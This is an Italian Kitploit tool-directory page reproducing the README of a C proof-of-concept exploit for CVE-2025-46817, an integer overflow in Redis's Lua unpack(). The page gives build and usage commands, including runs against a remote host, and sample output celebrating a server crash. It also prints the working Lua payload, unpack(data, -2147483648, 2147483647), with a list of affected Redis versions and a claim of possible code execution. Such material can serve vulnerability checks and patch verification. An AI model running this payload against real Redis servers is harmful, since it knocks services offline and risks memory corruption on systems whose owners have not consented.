Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Analisi delle VulnerabilitàExploitFuzzingPenetration TestingSicurezza dei Database
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

Exploit basato su C per CVE-2025-46817, una vulnerabilità di integer overflow in Redis, che consente il rilevamento di crash e potenziale RCE tramite payload Lua unpack().

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-46817 Exploit per Integer Overflow di Redis

Banner Language Platform

Un'implementazione leggera in C dell'exploit CVE-2025-46817 per la vulnerabilità di integer overflow in Redis.

🚀 Caratteristiche

  • Leggero: Singolo file C, nessuna dipendenza esterna oltre a hiredis
  • Veloce: Compilazione nativa per prestazioni massime
  • Output Colorato: Colori e icone del terminale accattivanti
  • Rilevamento Crash: Rileva automaticamente i crash del server
  • Controllo Versione: Identifica le versioni vulnerabili di Redis
  • Supporto Timeout: Timeout di connessione configurabili

📋 Requisiti

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Compilazione

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Utilizzo

Utilizzo Base

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Target Remoto

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Opzioni della Riga di Comando

root@kitploit:~
-H <host>    Host del server Redis (obbligatorio)
-P <port>    Porta del server Redis (obbligatoria)  
-t <timeout> Timeout di connessione in secondi (predefinito: 10)
-h           Mostra il messaggio di aiuto

📊 Esempio di Output

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Strumento Exploit CVE-2025-46817
                   Integer Overflow -> Catena RCE
                   Accesso -> https://pwnbuffer.org/

    Autore: Slayerkkk
    Target: Redis <= 8.2.1
    Tipo: Corruzione Memoria -> Esecuzione Codice

ℹ️ Test della connessione a 127.0.0.1:6379...
✅ Connessione riuscita
ℹ️ Versione Redis: 8.2.1
❌ VULNERABILE - Versione <= 8.2.1
ℹ️ Test dello scripting Lua...
✅ Lua abilitato (1+1=2)

🚀 AVVIO DELLO SFRUTTAMENTO
==================================================
💀 Esecuzione del payload dell'exploit...
    Payload: Integer overflow tramite unpack()
💥 SERVER CRASHATO - Connessione persa!

📊 RISULTATO DELLO SFRUTTAMENTO
==============================
  💥 Stato: crashato (2.34s)

💀 SFRUTTAMENTO RIUSCITO - Server crashato!
   Vulnerabilità CVE-2025-46817 confermata

🛡️ Versioni Vulnerabili

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Dettagli Tecnici

Vulnerabilità

L'exploit sfrutta un integer overflow nell'implementazione della funzione Lua unpack() di Redis (luaB_unpack). Quando viene chiamata con parametri specifici, l'aritmetica degli interi con segno va in overflow, causando il tentativo di Redis di materializzare un numero enorme di valori di ritorno.

Payload dell'Exploit

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Impatto

  • Crash del Server: Denial of service immediato
  • Corruzione della Memoria: Corruzione di heap/stack
  • Potenziale RCE: La corruzione della memoria potrebbe portare all'esecuzione di codice

🎯 Risultati del Rilevamento

Lo strumento riporta uno di questi stati:

  • ✅ sopravvissuto: Il server ha gestito il payload (probabilmente patchato)
  • 💥 crashato: Il server è crashato (vulnerabile)
  • ⚠️ timeout: Il server si è bloccato (probabilmente vulnerabile)
  • ❌ errore: Si è verificato un altro errore

🙏 Crediti

Autore: Slayerkkk
Sito Web: https://pwnbuffer.org

Scarica lo strumento